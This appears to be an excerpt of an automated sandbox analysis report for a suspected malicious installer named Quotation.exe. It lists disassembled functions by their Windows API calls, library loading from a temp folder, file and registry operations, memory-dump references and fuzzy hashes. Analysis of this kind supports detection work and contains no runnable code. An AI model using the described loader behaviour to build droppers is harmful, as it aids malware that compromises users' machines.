                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                              • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                              • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                              • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                              Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 00405613
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: d4491ad1612d2206b512eee90ead875262f305b7d8c2e0605547a046ec5ba4d4
                                                              • Instruction ID: a8e1189db69026d3652efcc6ea6e12950466f7228f8283b9583ebcadfcee3162
                                                              • Opcode Fuzzy Hash: d4491ad1612d2206b512eee90ead875262f305b7d8c2e0605547a046ec5ba4d4
                                                              • Instruction Fuzzy Hash: 8D215031904108BADF11AFA5CE49A9E7AB1BF44359F20413BF105B91E1CBBD89829A5D
                                                              Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree
                                                              • String ID: Call
                                                              • API String ID: 3394109436-1824292864
                                                              • Opcode ID: ad6c1877877f965fb6c9e744745bc6c5f6e70c3605440c79317dee03cd23f30b
                                                              • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                                                              • Opcode Fuzzy Hash: ad6c1877877f965fb6c9e744745bc6c5f6e70c3605440c79317dee03cd23f30b
                                                              • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                                                              Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                              • lstrlenW.KERNEL32 ref: 00402344
                                                              • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                              • String ID:
                                                              • API String ID: 1486964399-0
                                                              • Opcode ID: 40baac16729f7af862486c2703e7d92724be2a2b5509ba67ddea1d26ce7a737a
                                                              • Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
                                                              • Opcode Fuzzy Hash: 40baac16729f7af862486c2703e7d92724be2a2b5509ba67ddea1d26ce7a737a
                                                              • Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59
                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                              • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                              • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                              • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                              Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              • Opcode ID: 37b22303954a9010e892cd53203f3a4909aa4bead7a47c1afab0a91ccc10242d
                                                              • Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
                                                              • Opcode Fuzzy Hash: 37b22303954a9010e892cd53203f3a4909aa4bead7a47c1afab0a91ccc10242d
                                                              • Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D
                                                              Function 00405A75 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                              • GetLastError.KERNEL32 ref: 00405AC5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                              • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                              • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                              • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                              Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShow
                                                              • String ID:
                                                              • API String ID: 1136574915-0
                                                              • Opcode ID: a6b89ba8af6c1e3efb140ba777124f975671acfc2916f9b89d602844ba5f78df
                                                              • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                                                              • Opcode Fuzzy Hash: a6b89ba8af6c1e3efb140ba777124f975671acfc2916f9b89d602844ba5f78df
                                                              • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                                                              Function 00406915 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                              Function 00406011 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406015
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                              • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                              • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                              • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                              Function 00405ACF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                              • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                              • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                              • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                              Function 73422B98 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumWindows.USER32(00000000), ref: 73422C57
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: EnumWindows
                                                              • String ID:
                                                              • API String ID: 1129996299-0
                                                              • Opcode ID: be084a82f076620c9dd2bfb2ed9696065f080c1cbf2bcfffd387e08b1dc3b35c
                                                              • Instruction ID: 4f74fb59a2494e6b692ea2b907b7f3f158993ee4e7d949cfd4d58f475ec6c535
                                                              • Opcode Fuzzy Hash: be084a82f076620c9dd2bfb2ed9696065f080c1cbf2bcfffd387e08b1dc3b35c
                                                              • Instruction Fuzzy Hash: F541B2B2900308DFEB5DAF65DC40B59BFB8FB14352F308469E409F7241D6799480CBA9
                                                              Function 00402896 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                              • Instruction ID: 3ecce12b6213660a705480fd24811c4b14f3d13bc743ad81d22bf59cde18bc7d
                                                              • Opcode Fuzzy Hash: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                              • Instruction Fuzzy Hash: 8DE06D71904208AFDB01ABA5AA498AEB379EB44344B10483FF101B10C0CA794C119A2D
                                                              Function 004023B7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
